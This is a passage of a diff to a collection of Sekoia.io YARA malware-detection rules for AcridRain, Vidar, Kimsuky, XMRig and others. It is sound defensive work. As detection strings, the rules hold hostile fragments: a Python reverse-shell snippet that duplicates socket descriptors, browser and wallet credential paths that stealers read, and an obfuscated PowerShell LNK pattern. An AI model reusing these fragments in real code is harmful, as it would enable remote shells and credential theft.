-		hash = "add23fedfbf238f51173796f3feb12af"
-		hash = "25b8daaa5e9c5f8820261d7ebf79f3cd"
-		hash = "7fd45cc1de1230c916d5f547a9fc725c"
-		hash = "e6e4060e838d7af5f13ad64258d5db0c"
-		hash = "87dfc911885420380bea0cf74c8160d3"
-		hash = "bd15103b300cad635191972330913d17"
-		hash = "a8119b7803a6e0b8aed6bc74d9062b7f"
-		hash = "e1bc3efc33b57c9e1e6d37e5011228f2"
-		hash = "e1233a5f613aafec2c28133e810f536d"
-		hash = "fe88a5b91841b25b4bafa08d42faab22"
-		logic_hash = "db82489e1a1eb55960b7a8fd3e6f52db526295ed4e5b90ddea826c5be5f9a1c4"
+		logic_hash = "5317b133337ad333c97bbfa6c9d62aea5fd81f3b570f1d6b1ac93ea82062ef61"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "271384a078f2a2f58e14d7703febae8a28c6e2d7ddb00a3c8d3eead4ea87a0c0"
+		hash2 = "aa467945dd7b9b095e592fc96384bb385f2c95d00d5424e42bb6ab09827cb0ce"
+		hash3 = "aacaf0d4729dd6fda2e452be763d209f92d107ecf24d8a341947c545de9b7311"
+		hash4 = "ac5cb6e17f094068686225075251153e3eb21dc2d1ae744a97ab113cab034a36"
 
 	strings:
-		$ = "Source Response Empty!"
-		$ = "Source Response Len:"
-		$ = "GetFromSource:"
-		$ = "Failed add header!"
-		$ = "Failed receive response:"
-		$ = "Error: Status Code :"
-		$ = "WinHttpAddRequestHeaders"
-		$ = "X-FORWARDED-HOST:"
-		$ = "PROXY_DEL_CONTENT"
-		$ = "PROXY_CLEAR_CONTENT"
-		$ = "PROXY_SET_JS"
-		$ = "PROXY_GET_JS"
-		$ = "PROXY_ALLOW_PC"
-		$ = "Parse IP failed :"
-		$ = "Clear Proxy Contents Success!"
-		$ = "FILE_UPLOAD"
-		$ = "FILE_DOWNLOAD"
+		$ = "powershell.exe" wide
+		$ = "cmd.exe" wide
+		$ = "%s\\adult.sft" wide
+		$ = "%s\\Notice" wide
+		$ = "%s\\Message" wide
+		$ = "\\Microsoft\\Media Player" wide
+		$ = "Windows\\CurrentVersion\\Explorer\\Shell Folders" wide ascii
+		$ = "Windows\\CurrentVersion\\Internet Settings" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 6 of them
+		all of them and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "49a60be4b95b6d30da355a0c124af82b35000bce8f24f957d1c09ead47544a1e" )
 }
-rule SEKOIA_Apt_Unc4990_Emptyspace_Pyc : FILE
+rule SEKOIA_Infostealer_Win_Acridrain_Mar23 : FILE
 {
 	meta:
-		description = "Detects Python Bytecode of EmptySpace"
+		description = "Finds AcridRain samples"
 		author = "Sekoia.io"
-		id = "d970fd9c-1ce5-471c-96a1-146250f36b89"
-		date = "2024-02-01"
+		id = "049b502a-0fb6-4fa9-a1ce-f01a40269bdb"
+		date = "2023-03-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unc4990_emptyspace_pyc.yar#L1-L43"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_acridrain_mar23.yar#L1-L40"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "98e9c848f6b6276815b040681d7f36548b367257bb75d133309e89e8572a50b7"
+		logic_hash = "7fa1822acc6264a3a58fffef3fc572f8818d99037b20d5abb8bfb41f025949d4"
 		score = 75
 		quality = 78
 		tags = "FILE"
@@ -258725,52 +258822,46 @@ rule SEKOIA_Apt_Unc4990_Emptyspace_Pyc : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "PYBOOTSTRAP"
-		$ = "http://google.com/generate_204"
-		$ = "from"
-		$ = "pathZ"
-		$ = "usernamez"
-		$ = "timeZ"
-		$ = "win32api"
-		$ = "base64Z"
-		$ = "json"
-		$ = "marshalZ"
-		$ = "BOOTSTRAP_VERSION"
-		$ = "getZ"
-		$ = "sleepZ    b64encode"
-		$ = "dumps"
-		$ = "executableZ"
-		$ = "GetUserNameExZ"
-		$ = "NameSamCompatible"
-		$ = "encode"
-		$ = "decodeZ"
-		$ = "request_dataZ"
-		$ = "server"
-		$ = "post"
-		$ = "raise_for_status"
-		$ = "exec"
-		$ = "loadsZ    b64decode"
-		$ = "text"
-		$ = "globals"
-		$ = "bootstrap.py"
-		$ = "<module>"
+		$str01 = "\",\"r\":" ascii
+		$str02 = "\",\"s\":\"" ascii
+		$str03 = "\",\"p\":\"" ascii
+		$str04 = "\",\"a\":\"" ascii
+		$str05 = ",\"c\":" ascii
+		$str06 = ",\"g\" :" ascii
+		$str07 = "v7166637466625297979 t2537736810932639330 ath5ee645e0 altpriv cvcv=2 cexpw=1 smf=0" ascii
+		$str08 = "Content-Type: multipart/form-data; boundary=----974767299852498929531610575" ascii
+		$str09 = "\\Roaming\\Bitwarden\\data\\bitwarden.sqlite3" ascii
+		$ste01 = "\\Roaming\\Exodus\\exodus.wallet" ascii
+		$ste02 = "\\Roaming\\Electron Cash\\wallets" ascii
+		$ste03 = "\\Roaming\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb" ascii
+		$ste04 = "\\Local Extension Settings\\" ascii
+		$ste05 = "cnmamaachppnkjgnildpdmkaakejnhae" ascii
+		$ste06 = "ffnbelfdoeiohenkjibnmadjiehjhajb" ascii
+		$ste07 = "\\formhistory.sqlite" ascii
+		$ste08 = "\\logins.json" ascii
+		$ste09 = "encrypted_key" ascii
+		$ste10 = "\\Login Data" ascii
+		$enc01 = "bX5cVw8FKyAKZVxXXUAdSTUXCXdCV0FoOxoSF0ZEUEZS" ascii
+		$enc02 = "bX5cVw8FKywUaVVbRlkyPAQAFCB1U0dV" ascii
+		$enc03 = "bX5cVw8FKzQvUBFhRkYINSIWA3IRdlJADw==" ascii
+		$enc04 = "bX5cVw8FKzYWdUVcWl8iCBU5NXBERl1dBTUiFgNyEXZSQA8=" ascii
+		$enc05 = "bWBcVQMAGQI6UEJbGGgeGxgDD2xUQW9QCw8WEAp0" ascii
 
 	condition:
-		uint32be( 0 ) == 0x420d0d0a and all of them
+		uint16( 0 ) == 0x5A4D and 5 of ( $str* ) and 7 of ( $ste* ) and 1 of ( $enc* )
 }
-
-rule SEKOIA_Crybercrime_Prophetspider_Proxy : FILE
+rule SEKOIA_Apt_Kimsuky_Sharptongue_Strings : FILE
 {
 	meta:
-		description = "Detects the Winntaa decryption loop or imphash"
+		description = "Detects SharpTongue variants."
 		author = "Sekoia.io"
-		id = "b7637fc3-bf81-40c4-869c-1c283574e0a7"
-		date = "2022-02-17"
+		id = "56027edb-4e6e-40ec-a1b9-36c52b0dd3ec"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crybercrime_prophetspider_proxy.yar#L3-L41"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharptongue_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "711ef3fc6ac488200415b7178c7f639ad9f6c72077bbebac2e6d5e0bed7120dd"
+		logic_hash = "a7a9045485f6e713a8ae1bc87cd1296d64905b18e5d13d6e2b9a95328181af54"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258778,133 +258869,120 @@ rule SEKOIA_Crybercrime_Prophetspider_Proxy : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 56
-        57
-        48 8D 95 F0 FE FF FF
-        31 C0
-        66 21 02
-        48 89 CE
-        AC
-        48 89 D7
-        4C 89 C2
-        88 D4
-        30 C2
-        0F B6 CA
-        48 89 95 E8 FE FF FF
-        AC
-        30 E0
-        AA
-        E2 FA
-        88 C8
-        AA
-        48 8D 85 F0 FE FF FF
-        48 8B 95 E8 FE FF FF
-        5F
-        5E
-        C3 }
+		$s1 = "Post0.Open" ascii wide
+		$s2 = ".php?op=" ascii wide
+		$s3 = "s=s&Mid(c,ix*d+jx+1,1)" ascii wide
+		$s4 = "curl -o " ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( all of them or pe.imphash ( ) == "55e0b8e5b4d787c680ada4e450789a4d" )
+		$s2 in ( @s1 .. @s1 + 200 ) or $s2 in ( @s4 .. @s4 + 200 ) or $s3 and filesize < 500KB
 }
-
-rule SEKOIA_Backdoor_Win_Kimsuky : FILE
+rule SEKOIA_Apt_Kimsuky_Malicious_Gotopwsh_Lnk : FILE
 {
 	meta:
-		description = "Detect the backdoors used by Kimsuky based on specific PE ressources"
+		description = "Detects malicious LNK used by Kimsuky"
 		author = "Sekoia.io"
-		id = "db927d1c-34cf-4501-a6ce-3e8ecdefc5a3"
-		date = "2024-06-04"
+		id = "cfe9adf5-2c06-4d04-8006-c4eea0dab549"
+		date = "2023-09-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_kimsuky.yar#L4-L38"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_malicious_gotopwsh_lnk.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ba40427f7e305a6e6cec6bb0165b49e6ce215ecf66fc2e05954c10e4d9acf9b0"
+		logic_hash = "1537ea232e745b1ed9e4b7f6b9ba779a3498f5edf0c46bdccfdc511137b2bb3a"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "000e2926f6e094d01c64ff972e958cd38590299e9128a766868088aa273599c7"
-		hash2 = "cca1705d7a85fe45dce9faec5790d498427b3fa8e546d7d7b57f18a925fdfa5d"
+
+	strings:
+		$ = {67 00 6f 00 74 00 6f 00 26 00 70 00 5e 00 6f 00 77 00 5e 00 65 00 5e 00 72 00 73 00 5e 00 68 00 65 00 5e 00 6c 00 5e 00 6c}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ac9ed305c6dac749163db359736e7d92fca9173ff5c9e1f021d500b306e3c5ec" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "0ca965ccf7324b098da617909d38986c1e6aae3e12d9629975f1815ed4ed3907" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "25d79e59a6b625e5c22ccb55cc49373d38cc6f20cb75504b0df1bc0804bb1247" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce5619ffe04ec569bf2565e0964156378bda7c42eb646bedbac2191a5af7bebf" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce10e65f7bf105fc06005340f0a8eaea9b351f3750d2818c1cf2ca25a7f495be" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "5a9e2a392c530ab8b38ff917ae0f28496107f1bde94e89515931fd29a0bfb2e5" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "19f4f3a05b809d8e33bb0004f62899ca5f9eac7e4cdba68dfd5c0a6f2d71bec3" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b9c208b9bada7bac4d5bfe53992f570e34e0b4d5cfa0862de9847ddf5630ab9a" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ac9ed305c6dac749163db359736e7d92fca9173ff5c9e1f021d500b306e3c5ec" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "0ca965ccf7324b098da617909d38986c1e6aae3e12d9629975f1815ed4ed3907" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "25d79e59a6b625e5c22ccb55cc49373d38cc6f20cb75504b0df1bc0804bb1247" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce5619ffe04ec569bf2565e0964156378bda7c42eb646bedbac2191a5af7bebf" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce10e65f7bf105fc06005340f0a8eaea9b351f3750d2818c1cf2ca25a7f495be" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "5a9e2a392c530ab8b38ff917ae0f28496107f1bde94e89515931fd29a0bfb2e5" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "19f4f3a05b809d8e33bb0004f62899ca5f9eac7e4cdba68dfd5c0a6f2d71bec3" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b9c208b9bada7bac4d5bfe53992f570e34e0b4d5cfa0862de9847ddf5630ab9a" )
+		uint32be( 0 ) == 0x4c000000 and all of them
 }
-rule SEKOIA_Darkriver_Encodedurl : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_13 : FILE
 {
 	meta:
-		description = "Detects encoding URL inside docx documents"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "60f1676f-dade-4376-9980-f510dff52ae5"
-		date = "2023-10-10"
+		id = "2d61d7b8-5348-4cc8-9d41-61799b573e3b"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/darkriver_encodedurl.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_13.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9477ec39cc1d4cfad676d071748e7e1918a3996b342663cb0a01658846bbf9f5"
+		logic_hash = "fb6b71bf1e89abf872fb3ef02a228f370f0fcc10d5aab70418fe8735283165da"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "5c9551388213f54c4b54cd42ccb034d8d9173a4bbfcf8b666e0db8df929762e7"
-		hash1 = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
-		hash1 = "3b05e89ff2338472cc493d59bae450338effd29f0ed7d46fb999709e63cf2472"
 
 	strings:
-		$s1 = "&#109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#116;&#112;"
-		$s2 = "&#38;&#95;&#116;&#115;&#61;"
-		$header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
+		$ = "Private Function decodeHex(hex)"
+		$ = "EL.Text = hex "
+		$ = "serialized_obj = serialized_obj & "
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
 
 	condition:
-		filesize < 500KB and any of ( $s* ) and $header at 0
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Infostealer_Win_Solarmarker_Dll : FILE
+rule SEKOIA_Miner_Lin_Xmrig_Strings : FILE
 {
 	meta:
-		description = "Finds SolarMarker DLL based on characteristic strings"
+		description = "Detects XMRig ELF"
 		author = "Sekoia.io"
-		id = "a2fe7f09-7134-4054-ba40-5ea66785a26c"
-		date = "2022-12-09"
+		id = "2f99020b-424c-4433-860c-5e9ab4e1f1de"
+		date = "2022-09-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_solarmarker_dll.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/miner_lin_xmrig_strings.yar#L1-L36"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5be0a95adb7e486cdec5f0e8433afed41516fc1a990e1d1ba00db7e8fb32dbbb"
+		logic_hash = "4946e5099d7d342c8cf6644146ffec8506e786a1d4de0b05ef039bcf2b0fdad2"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2024-01-04"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$zka = "zkabsr" wide
-		$str0 = "set_PersistKeyInCsp" ascii
-		$str1 = "get_IV" ascii
-		$str2 = "get_MachineName" ascii
-		$str3 = "get_Current" ascii
-		$str4 = "ps_script" ascii
-		$str5 = "request_data" ascii
-		$str6 = "WindowsBuiltInRole" ascii
-		$str7 = "DllImportAttribute" ascii
-		$str8 = "get_BlockSize" ascii
-		$str9 = "GetRequestStream" ascii
+		$ = "XMRig "
+		$ = "pool_wallet"
+		$ = "IP Address currently banned"
+		$ = "rigid"
+		$ = "diff_current"
+		$ = "shares_good"
+		$ = "shares_total"
+		$ = "avg_time"
+		$ = "avg_time_ms"
+		$ = "hashes_total"
+		$ = "pool address"
+		$ = "ping time"
+		$ = "connection time"
+		$ = "daemon+wss://"
+		$ = "daemon+https://"
+		$ = "daemon+http://"
+		$ = "socks5://"
+		$ = "stratum+ssl://"
+		$ = "stratum+tcp://"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $zka and 3 of ( $str* ) ) or ( all of ( $str* ) ) ) and filesize < 1MB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 10MB and 7 of them
 }
-rule SEKOIA_Guloader_Unpacker_Decoded : FILE
+rule SEKOIA_Apt_Queueseed : FILE
 {
 	meta:
-		description = "GuLoader Unpacker b64 decoded"
+		description = "Detects strings of Queueseed/Kapeka malware"
 		author = "Sekoia.io"
-		id = "ca3f4fce-b3a1-4672-a2ca-29ea347eb23d"
-		date = "2024-02-07"
+		id = "35f7ffd5-4f6f-4b31-8d60-c713a15d14e8"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_unpacker_decoded.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_queueseed.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5de4a147b2dea8a144905b7f1786199bfeef3006ac58179409cfd3dcaa116725"
+		logic_hash = "80d1135d63a351cabf45d2266c0ffc770e11669103107cd40caf00eb62c836ed"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258912,26 +258990,33 @@ rule SEKOIA_Guloader_Unpacker_Decoded : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$jumps = {71 01 9b 71 01 9b}
-		$s1 = "([String]$"
-		$s2 = "For($"
-		$s3 = ",[Parameter(Position = 1)] [Type] $"
+		$ = {2D 00 6F 00 00 00}
+		$ = {2D 00 62 00 63 00 00 00}
+		$ = {20 00 00 00 00 00 00 00}
+		$ = {20 00 2D 00 77 00 00 00}
+		$ = {35 00 3A 00 20 00 00 00}
+		$ = {34 00 3A 00 20 00 00 00}
+		$ = {33 00 3A 00 20 00 00 00}
+		$ = {32 00 3A 00 20 00 00 00}
+		$ = {31 00 3A 00 20 00 00 00}
+		$ = {50 00 49 00 44 00 20 00 3A 00 20 00 00 00 00 00}
+		$ = "ExitCode : " wide
 
 	condition:
-		filesize < 500KB and @jumps < 1000 and 2 of ( $s* )
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 200KB
 }
-rule SEKOIA_Stealer_Win_Demotryspy : FILE
+rule SEKOIA_Apt_Qnapworm_Loader_May2022 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects the QNAPWorm loader"
 		author = "Sekoia.io"
-		id = "70af0e40-b177-49a3-bff4-723f3f4aa375"
-		date = "2024-02-09"
+		id = "c6e87a55-73ea-4df4-ab61-b5d34968d741"
+		date = "2022-05-23"
 		modified = "2024-12-19"
-		reference = "https://paper.seebug.org/3115/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/stealer_win_demotryspy.yar#L1-L22"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_qnapworm_loader_may2022.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b7a910e4d394d2122e6b4fe76daa6691a642396e27f7a47d09232f4b7eb424ee"
+		logic_hash = "d31fdaaacd417a4191e79e3a287e84c55109158eaacc789b2129e2ba94e443f6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -258939,87 +259024,102 @@ rule SEKOIA_Stealer_Win_Demotryspy : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$demotry1 = "DemoTry.exe"
-		$demotry2 = "DemoTry\\Release\\DemoTry.pdb"
-		$wide1 = "\\loc.tmp" wide
-		$wide2 = "\\log.tmp" wide
-		$wide3 = "\\Google\\Chrome\\User Data" wide
-		$wide4 = "\\Default\\Login data" wide
-		$wide5 = "\\Local State" wide
+		$s1 = {
+        66 C1 C0 05
+        0F B7 D8
+        81 C3 85 D0 FF FF
+        66 C1 C3 02
+        0F B7 C3
+        0F B6 9A ?? ?? ?? ??
+        33 D8
+        88 1C 11
+        42
+        0F B6 D2
+        81 FA ?? 00 00 00
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( 1 of ( $demotry* ) or all of ( $wide* ) )
+		uint16be( 0 ) == 0x4d5a and all of ( $s* )
 }
-rule SEKOIA_Storm_1811_Files_Dat
+rule SEKOIA_Apt_Mustangpanda_Zpakage : FILE
 {
 	meta:
-		description = "Detects files used in a campaign performed by the intrusion set Storm-1811"
+		description = "Detect obfuscation seen in ZPAKAGE"
 		author = "Sekoia.io"
-		id = "8b14f276-0c39-422b-9b19-d96b139a7ae8"
-		date = "2024-06-10"
+		id = "a4767d12-5058-4a26-be62-0cec685917bd"
+		date = "2023-03-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/storm_1811_files_dat.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_zpakage.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d1d5b76671cefe8b876ca8df50205a04ebbcd973f115919b901f6a7946492904"
+		hash = "711c0e83f4e626a7b54e3948b281a71915a056c5341c8f509ecba535bc199bee"
+		logic_hash = "52ad51589ca154fbf6e5829a2c80a9b811809288bed6995820a0ca8aa218d8ef"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RuntimeBroker" ascii fullword
-		$s2 = "InstallSpamFilters" ascii fullword
-		$s3 = "newfile333.txt" ascii fullword
-		$s4 = "Installing spam filter kb_outlook" ascii fullword
-		$s5 = "s.zip" ascii fullword
-		$s6 = "Update completed" ascii fullword
-		$s7 = "Updates installed" ascii fullword
-		$s8 = "update_log.tgz uploaded ok" ascii fullword
-		$s9 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii fullword
-		$s10 = "runtimebroker_connect" ascii fullword
+		$chunk_1 = {
+        88 94 1D ?? ?? ?? ??
+        8A 84 1D ?? ?? ?? ??
+        83 ?? ??
+        88 84 1D ?? ?? ?? ??
+        8A 84 1D ?? ?? ?? ??
+        83 ?? ??
+        88 84 1D ?? ?? ?? ??
+        8A 84 1D ?? ?? ?? ??
+        83 ?? ??
+        88 84 1D ?? ?? ?? ??
+        0F BE 8C 1D ?? ?? ?? ??
+        0F BE 84 1D ?? ?? ?? ??
+        }
 
 	condition:
-		5 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and filesize < 11MB and #chunk_1 > 20
 }
-rule SEKOIA_Tool_Generic_Python_Reverse_Shell_Strings : FILE
+rule SEKOIA_Apt_Apt_K_47_Orpcbackdoor : FILE
 {
 	meta:
-		description = "Detects reverse shell"
+		description = "Detects ORPCBackdoor used by APT-K-47"
 		author = "Sekoia.io"
-		id = "5b926d15-4f21-428c-a9fa-ee085a98d42b"
-		date = "2024-04-16"
+		id = "9768371d-763f-45df-b727-ccda97501aaa"
+		date = "2024-02-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_generic_python_reverse_shell_strings.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt_k_47_orpcbackdoor.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bb4fcef595f4be035815f536786987ac1343727f16c0560a1cb593e854ba8f17"
+		logic_hash = "4a05e68eca0954e3bca5ebec6c63bf0535051f8d99f65940b7ed00f49e659f2d"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "import sys,socket,os,pty;"
-		$ = "[os.dup2(s.fileno(),fd) for fd in (0,1,2)]"
+		$s1 = "RegisteredOrganization:\t\t\t" ascii wide
+		$s2 = "To Be Filled By O.E.M" ascii wide
+		$s3 = ">> "
+		$s4 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%u" wide
+		$s5 = "Error! GetSystemDirectory failed."
+		$s6 = "Domain:\t\t\t\t"
 
 	condition:
-		all of them and filesize < 1000
+		all of them and filesize < 300KB and uint16be( 0 ) == 0x4d5a
 }
-rule SEKOIA_Infostealer_Win_Vidar_Strings_Nov23 : FILE
+rule SEKOIA_Koi_Netstealer : FILE
 {
 	meta:
-		description = "Finds Vidar samples based on the specific strings"
+		description = "Detects NET ofbuscated Stealer used loaded by KoiLoader"
 		author = "Sekoia.io"
-		id = "b2c17627-f9b8-4401-b657-1cce560edc76"
-		date = "2023-11-10"
+		id = "deb06e2a-848c-44b3-be95-017ebccf11f8"
+		date = "2024-03-20"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/crep1x/status/1722652451319202242"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_vidar_strings_nov23.yar#L1-L33"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koi_netstealer.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1a2fc421fb4058b78de28d97d69b126e685f7677b7998f5b6ae3cbcee0ef3f00"
+		logic_hash = "814db1092820ff1ed9e592dc92c72ad73643eb6d68df9f593ed637434373e41b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259027,102 +259127,82 @@ rule SEKOIA_Infostealer_Win_Vidar_Strings_Nov23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "MachineID:" ascii
-		$str02 = "Work Dir: In memory" ascii
-		$str03 = "[Hardware]" ascii
-		$str04 = "VideoCard:" ascii
-		$str05 = "[Processes]" ascii
-		$str06 = "[Software]" ascii
-		$str07 = "information.txt" ascii
-		$str08 = "%s\\*" ascii
-		$str09 = "Select * From AntiVirusProduct" ascii
-		$str10 = "SELECT target_path, tab_url from downloads" ascii
-		$str11 = "Software\\Martin Prikryl\\WinSCP 2\\Configuration" ascii
-		$str12 = "UseMasterPassword" ascii
-		$str13 = "Soft: WinSCP" ascii
